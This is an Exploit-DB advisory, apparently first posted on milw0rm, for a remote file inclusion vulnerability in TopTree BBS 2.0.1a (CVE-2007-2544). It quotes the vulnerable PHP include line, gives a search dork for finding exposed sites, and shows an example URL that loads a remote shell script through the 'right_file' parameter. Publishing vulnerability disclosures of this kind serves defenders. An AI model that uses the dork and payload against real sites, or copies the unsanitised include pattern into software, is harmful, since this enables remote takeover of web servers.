PHP TopTree BBS 2.0.1a - 'right_file' Remote File Inclusion

Author: kezzap66345
type: webapps
platform: php
port: 
date_added: 2007-05-03 
date_updated: 2016-09-30 
verified: 1 
codes: OSVDB-35787;CVE-2007-2544 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combbsNewV2.0.1a.zip

##############################################################################################
##############################################################################################
#TopTree <= 2.01a Remote File Inclusion Vulnerability
#
#Dork:"Powered by DVHome.cn"
#
#Vuln Code
###################################################################################
#
#ERROR:templates/default/tpl_message.php
#
# <?php include ($right_file); ?>
#
#BUG:
#
#Example:http://site.com/path/templates/default/tpl_message.php?right_file=[[Sh3LL
Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/project/showfiles.php?group_id=169574&package_id=193438&release_id=426108
#
#Original W3b
Site############################################################################
#
#http://www.dvhome.cn
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-04]